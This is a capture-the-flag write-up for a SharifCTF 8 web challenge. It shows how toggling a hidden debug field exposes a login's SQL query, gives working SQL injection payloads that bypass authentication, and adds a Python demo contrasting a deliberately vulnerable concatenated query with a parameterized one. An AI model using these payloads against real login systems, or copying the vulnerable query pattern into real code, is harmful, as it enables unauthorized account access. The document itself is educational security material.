SharifCTF 8 - Write-ups

Information

Version

By    | Version | Comment
noraj | 1.0     | Creation

CTF

  • Name : SharifCTF 8
  • Website : ctf.certcc.ir
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

50 - Hidden input - Web

Login if you can :)

There is a hidden input:

<form method="POST" action="login.php">
<div class="login-block">
<h1>Login</h1>
<input type="text" value="" placeholder="Username" id="Username" name="Username"/>
<input type="password" value="" placeholder="Password" id="Password" name="Password"/>
<input type="hidden" name="debug" id="debug" value="0">
<button>Login</button>
</div>
</form>

Change the debug POST value to 1, so the request body becomes: Username=admin&Password=pass&debug=1.

The response now shows us the SQL query used.

username: admin
password: pass
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('pass')

At first I thought this payload should work, but it didn't.

Username=admin%27%29--+-&Password=sdf&debug=0

username: admin')-- -
password: sdf
SQL query: SELECT * FROM users WHERE username=('admin')-- -') AND password=('sdf')

The comment doesn't seem to work, so let's generate a fully working query:

Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1

username: admin
password: ') OR 1=1 OR 999 > ORD('a
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('') OR 1=1 OR 999 > ORD('a')

Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}
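
Why the final payload bypasses the check, and how bound parameters stop it, as an added example that is not part of the original write-up or the challenge's code. The users table contents, the function names and the in-memory SQLite stand-in (with an ORD shim for the MySQL function) are assumptions; the query shape and the password value are the ones shown above.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the challenge's users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    # SQLite has no ORD(); register a shim so the page's MySQL-style payload parses.
    db.create_function("ORD", 1, lambda s: ord(s[0]) if s else 0)
    # Plaintext password column mirrors the query on the page; real systems store hashes.
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_vulnerable(db, username, password):
    """Assumed reconstruction of the query shape the debug output reveals."""
    query = ("SELECT * FROM users WHERE username=('" + username +
             "') AND password=('" + password + "')")
    # AND binds tighter than OR, so a trailing "OR 1=1" makes the WHERE clause true.
    return db.execute(query).fetchone() is not None, query

def login_hardened(db, username, password):
    """Same lookup with bound parameters: input is treated as data, never SQL text."""
    query = "SELECT * FROM users WHERE username=(?) AND password=(?)"
    return db.execute(query, (username, password)).fetchone() is not None

# Password value taken from the write-up's final request (URL-decoded).
PAYLOAD = "') OR 1=1 OR 999 > ORD('a"

if __name__ == "__main__":
    db = make_db()
    ok, query = login_vulnerable(db, "admin", PAYLOAD)
    print("vulnerable:", ok, "|", query)
    print("hardened, payload:", login_hardened(db, "admin", PAYLOAD))
    print("hardened, real password:", login_hardened(db, "admin", "constructed-secret"))
```

The hardened version also has no client-controlled debug switch: echoing the generated query back to the user, as debug=1 does here, is what made the quoting style visible in the first place.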
